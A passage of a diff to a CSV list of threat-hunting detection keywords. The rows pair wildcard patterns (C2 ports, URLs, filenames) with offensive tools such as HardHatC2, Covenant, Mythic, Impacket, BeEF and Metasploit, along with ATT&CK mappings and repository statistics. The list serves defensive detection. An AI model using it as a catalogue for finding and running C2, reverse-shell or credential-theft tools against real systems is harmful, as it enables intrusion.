Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*http*127.0.0.1:21802*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" @@ -11312,7 +11465,7 @@ "*http*127.0.0.1:5000*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:50050*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*http*127.0.0.1:5096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*http*127.0.0.1:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*http*127.0.0.1:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*http*127.0.0.1:7096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*127.0.0.1:8080/*.exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" @@ -11323,7 +11476,7 @@ "*http*localhost:5000*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*localhost:50050*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*http*localhost:5096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*http*localhost:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*http*localhost:57230*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*http*localhost:7096*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http*localhost:9631*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*http.title:*BIG-IP®*- Redirect*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","54","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" @@ -11335,112 +11488,112 @@ "*http://*Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" "*http://10.10.13.37*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*http://127.0.0.1/CrossC2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*http://127.0.0.1/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*http://127.0.0.1:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http://127.0.0.1/FUZZ*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*http://127.0.0.1:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*http://127.0.0.1:35000*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*http://127.0.0.1:443/aaaaaaaaa*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*http://127.0.0.1:443/bbbbbbbbb*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*http://127.0.0.1:7444*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*http://127.0.0.1:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*http://127.0.0.1:7444*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*http://127.0.0.1:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*http://127.0.0.1:8000/1.jpg*","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","0","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" -"*http://127.0.0.1:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*http://127.0.0.1:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*http://192.168.1.179:8000/session*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-02T19:54:24Z","2023-04-28T01:58:18Z" +"*http://127.0.0.1:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*http://127.0.0.1:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*http://192.168.1.179:8000/session*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" "*http://LhOsT/FiLNaMe.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*http://localhost:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*http://localhost:30662*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","954","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" +"*http://localhost:3000/ui/panel*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*http://localhost:30662*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","955","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" "*http://localhost:58082/broadcast?id=*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" -"*http://localhost:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*http://localhost:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*http://localhost:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*http://shell:7681/token*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*http://localhost:7474/browser/*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","neo4j default local url","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*http://localhost:8080*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*http://localhost:9090/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*http://shell:7681/token*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*http://tarantula.by.ru/localroot/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*http://vpsip:28888*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*http://wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*http_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*http_default_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*http://wfuzz.org*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*http_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*http_default_users.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*http_malleable.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*http_ntlmrelay.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 